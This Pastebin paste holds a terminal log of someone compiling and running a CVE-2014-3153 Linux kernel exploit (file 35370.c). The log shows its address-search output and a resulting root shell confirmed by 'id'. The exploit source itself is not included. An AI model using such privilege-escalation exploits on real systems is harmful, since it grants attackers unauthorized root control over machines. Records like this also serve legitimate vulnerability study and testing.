Advertisement
Guest User

Untitled

a guest
Jul 4th, 2015
269
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. [kokot@localhost ~]$ gcc 35370.c -lpthread
  2. [kokot@localhost ~]$ ls -ltr
  3. total 44
  4. -rw-rw-r--. 1 kokot kokot 17979 Jul 4 18:28 35370.c
  5. -rwxrwxr-x. 1 kokot kokot 21030 Jul 4 18:30 a.out
  6. [kokot@localhost ~]$ ./a.out
  7. CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)
  8. Press RETURN after one second...
  9. Checking whether exploitable..OK
  10. Seaching good magic...
  11. magic1=0xffff88001f68bc70 magic2=0xffff88001dfd1c80
  12. magic1=0xffff88001f68bc70 magic2=0xffff88001dfd1c80
  13. magic1=0xffff88001b5b9c70 magic2=0xffff88001dfd1c80
  14. Good magic found
  15. Hacking...
  16. [root@localhost ~]# id
  17. uid=0(root) gid=0(root) groups=0(root),1000(kokot) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
  18. [root@localhost ~]#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement